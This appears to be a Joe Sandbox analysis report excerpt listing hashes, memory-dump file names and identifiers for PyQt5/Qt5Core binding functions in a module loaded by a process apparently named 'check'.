                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?start@Device@@@@@Flag@Flags@ModeOpenProcess@@String@@$List@@String
                                                                                                                                                                                                                • String ID: BJ1J1|J1$BJ1|J1$B|J1$QProcess$start$start(self, program: Optional[str], arguments: Iterable[Optional[str]], mode: Union[QIODevice.OpenMode, QIODevice.OpenModeFlag] = QIODevice.ReadWrite)start(self, command: Optional[str], mode: Union[QIODevice.OpenMode, QIODevice.OpenModeFlag] = QIODevice.ReadW
                                                                                                                                                                                                                • API String ID: 3940508783-1543759316
                                                                                                                                                                                                                • Opcode ID: 810e1edcfdf62ea427b0aa93c850c2909cef9c52f9c6e3bfc922e609932009ea
                                                                                                                                                                                                                • Instruction ID: d33b3cb0c937a79be844a13097b0358f829a1c18d7ae9f2ee5694ffe64eed75b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 810e1edcfdf62ea427b0aa93c850c2909cef9c52f9c6e3bfc922e609932009ea
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 109117B660AF81D9DB50CF25E8846E937B8FB48B88F544136EA8D17B28EF78D154C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?toString@QDateTime@@QEBA?AVQString@@W4DateFormat@Qt@@@Z.QT5CORE ref: 00007FFB02FE4497
                                                                                                                                                                                                                • ?toString@QDateTime@@QEBA?AVQString@@AEBV2@@Z.QT5CORE ref: 00007FFB02FE453F
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Date$String@String@@Time@@$Format@Qt@@@V2@@malloc
                                                                                                                                                                                                                • String ID: BJ1$BJ1J9$B|E$QDateTime$toString$toString(self, format: Qt.DateFormat = Qt.TextDate) -> strtoString(self, format: Optional[str]) -> strtoString(self, format: Optional[str], cal: QCalendar) -> str
                                                                                                                                                                                                                • API String ID: 2560301481-1268491986
                                                                                                                                                                                                                • Opcode ID: 541762d940661d6b7306f830d6a3df8652f5171f4042e91e39f30f4647900443
                                                                                                                                                                                                                • Instruction ID: 5bce43cc3254458d7cd8492b3c0cb70def5fba3cdccdd2883d1ecd9a3b4657b5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 541762d940661d6b7306f830d6a3df8652f5171f4042e91e39f30f4647900443
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA7117B660AF41C9DB908F25E884AA973B8FB4CB88F551136EA4D57B68EF38D154C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?mapping@QSignalMapper@@QEBAPEAVQObject@@H@Z.QT5CORE ref: 00007FFB02F124A2
                                                                                                                                                                                                                • ?mapping@QSignalMapper@@QEBAPEAVQObject@@AEBVQString@@@Z.QT5CORE ref: 00007FFB02F12532
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?mapping@Mapper@@Object@@Signal$String@@@
                                                                                                                                                                                                                • String ID: BJ1$BJ8$QSignalMapper$mapping$mapping(self, id: int) -> Optional[QObject]mapping(self, text: Optional[str]) -> Optional[QObject]mapping(self, widget: Optional[QWidget]) -> Optional[QObject]mapping(self, object: Optional[QObject]) -> Optional[QObject]
                                                                                                                                                                                                                • API String ID: 600360435-2615264203
                                                                                                                                                                                                                • Opcode ID: 9c7cbf00bc1fe349ecfafbbababc3ff9e031942361720e852b8a2ebb97b513bb
                                                                                                                                                                                                                • Instruction ID: cf45336295827f561bb1ab617a578a202ce53855958a8e1a3bb4d0253be075de
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c7cbf00bc1fe349ecfafbbababc3ff9e031942361720e852b8a2ebb97b513bb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC71FAB6605A4685EB508F25E8846E937B4FB4CB98F495132DE8D53B28EF3CD194C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String@@$?dispose@Data@1@@Data@@List$?findExecutable@List@@@Paths@@StandardStringmalloc
                                                                                                                                                                                                                • String ID: J1|J1$QStandardPaths$findExecutable$findExecutable(executableName: Optional[str], paths: Iterable[Optional[str]] = []) -> str
                                                                                                                                                                                                                • API String ID: 4250903646-1038964600
                                                                                                                                                                                                                • Opcode ID: 40ac52136d379b44b0f96897d2559c3f1371aa144ae44f78c0d7d70149246a42
                                                                                                                                                                                                                • Instruction ID: b2538ac7bc3d39ac1842615700e1e5999cb2d833693fa7a7d0cefb7505cc0b0e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40ac52136d379b44b0f96897d2559c3f1371aa144ae44f78c0d7d70149246a42
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6517AB670AA42C9DB508F39E8846ED33A0FB48B98F594236DA5E13B64DF38D845C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_Thread$?exec@Application@@CoreFromLongLong_RestoreSave
                                                                                                                                                                                                                • String ID: QCoreApplication$__pyQtPostEventLoopHook__$__pyQtPreEventLoopHook__$exec$exec() -> int
                                                                                                                                                                                                                • API String ID: 422401538-3648940595
                                                                                                                                                                                                                • Opcode ID: dd698b967b90af96483acdcb30ac179c72ecf05201a8f63031aa8343a4c74525
                                                                                                                                                                                                                • Instruction ID: ab2d39e8ab4be8bb5ca7ced5096b12b189285bec816e5861999a5b9b7270cd18
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd698b967b90af96483acdcb30ac179c72ecf05201a8f63031aa8343a4c74525
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22112EB5A09A46C2DB40AB25E8887A933A0FB88B45F981032D64E63724EF3CD509C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Item$Selection@@$A@$$SelectionV0@@$??1?$?mapIdentityList@Model@@ProxyRange@@@@Source@V2@@
                                                                                                                                                                                                                • String ID: BJ9$QIdentityProxyModel$mapSelectionToSource$mapSelectionToSource(self, selection: QItemSelection) -> QItemSelection
                                                                                                                                                                                                                • API String ID: 4247362648-725092228
                                                                                                                                                                                                                • Opcode ID: 7c1cc7183abd8430f3d7e5f2eb6d4046d9d8606a24135a21cdfcd26afd4c5064
                                                                                                                                                                                                                • Instruction ID: ce65bb8f6e4c9af3d2b55b9b0c35d5b7cf658a61705577e8e70d251ee7d7ba31
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c1cc7183abd8430f3d7e5f2eb6d4046d9d8606a24135a21cdfcd26afd4c5064
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 663152A160AB4685DA90DF25F8587A963A1FB88FC0F585032DA8E53B28EF3DD144C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setCodec@StreamWriter@@$Codec@@@DeallocText
                                                                                                                                                                                                                • String ID: B@J8$BAA$QXmlStreamWriter$setCodec$setCodec(self, codec: Optional[QTextCodec])setCodec(self, codecName: Optional[str])
                                                                                                                                                                                                                • API String ID: 4105481832-1310168743
                                                                                                                                                                                                                • Opcode ID: 8fa325591cffdc14668d58702e077a0c341b2aed3601587454bda56fd751f228
                                                                                                                                                                                                                • Instruction ID: 551527e9d7690ca5d389a79062407587cc75f7a53feb9ae2c60c02f40a34f9ac
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fa325591cffdc14668d58702e077a0c341b2aed3601587454bda56fd751f228
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 704149B6A09F86C1DB50CF25E8886A973B4FB88B90F544132DA9D53724EF7DD588C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?exists@Bool_Dir@@FromLong$String@@@
                                                                                                                                                                                                                • String ID: BJ1$QDir$exists$exists(self) -> boolexists(self, name: Optional[str]) -> bool
                                                                                                                                                                                                                • API String ID: 4129212189-2453210162
                                                                                                                                                                                                                • Opcode ID: ccf3063bb5a47fd8b6343cfe0b6d2e9382f85302039485e3981a3d886a308a90
                                                                                                                                                                                                                • Instruction ID: 20a089459725d884b81ce6abe5162ac41391039a9556314fc61a1b239ac19597
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccf3063bb5a47fd8b6343cfe0b6d2e9382f85302039485e3981a3d886a308a90
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 733162B6A09B46C2DB50CF25E488BA973B4FB88B90F484036DA8D53764EF7CD198C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_Thread$?fatal@DeallocLogger@@MessageRestoreSave
                                                                                                                                                                                                                • String ID: BAA$QMessageLogger$fatal$fatal(self, msg: Optional[str])
                                                                                                                                                                                                                • API String ID: 556509206-503963757
                                                                                                                                                                                                                • Opcode ID: fface079d41b0ab72372710452f2dd9669d5759da9e7058db186c9dfe19c5cc5
                                                                                                                                                                                                                • Instruction ID: 3f5d0e5a520462b167fc044e66474ba1c77a86a29299bfcc47e41175b784ee24
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fface079d41b0ab72372710452f2dd9669d5759da9e7058db186c9dfe19c5cc5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 522107B6A09F46C5DB009F25E898AA933B5FB48B84F990032CA4D23324EF7DD559C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
